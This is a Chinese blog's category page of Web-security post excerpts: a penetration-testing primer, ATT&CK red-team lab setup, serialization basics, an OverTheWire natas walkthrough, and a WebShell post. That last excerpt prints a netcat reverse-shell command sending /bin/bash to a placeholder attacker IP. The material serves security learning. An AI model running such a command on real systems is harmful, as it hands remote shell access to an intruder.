随笔分类 - Web安全
摘要:Web 安全入门 前言 网络安全是一个系统化工程,Web 安全只是其很小的一个部分,因为 Web 应用是目前最常见的软件服务形式,所以 Web 往往是黑客们青睐的攻击点。 我们可以将渗透测试简单地理解为对 Web 应用开展的安全性测试,所以理解 Web 应用的工作原理是开展一切渗透测试工作的前提,涉
阅读全文
摘要:ATT&CK红队评估一 镜像下载 镜像下载地址 网络配置 网络拓扑图 VMware 网络配置 使用 VMware 的『虚拟网络编辑器』添加两个虚拟网络。 虚拟网络名称 网段 DHCP VMnet3 192.168.72.0/24 是 VMnet4 192.168.52.0/24 是 虚拟机网络配置
阅读全文
摘要:1 序列化与反序列化 1.1 概念 序列化: 将数据结构或对象转换成二进制串的过程 反序列化:将在序列化过程中所生成的二进制串转换成数据结构或者对象的过程 1.2 使用场景 当你想把的内存中的对象状态保存到一个文件中或者数据库中时候。 当你想用套接字在网络上传送对象的时候。 当你想通过 RMI 传输
阅读全文
摘要:0x00 natas0 http://natas0.natas.labs.overthewire.org/ 直接 F12 查看源码,找到密码。 0x01 natas1 http://natas1.natas.labs.overthewire.org/ 禁用了右键,直接 F12 查看源码,找到密码。
阅读全文
摘要:1 WebShell 到 bash/sh 1.1 反弹 Shell 攻击机器 $ nc -lvvp 4444 # 开启 4444 端口,等待目标机器回连 受害机器 $ nc -nv x.x.x.x 4444 -e /bin/bash # x.x.x.x 是攻击机器的IP,将Shell反弹 2 不同用
阅读全文
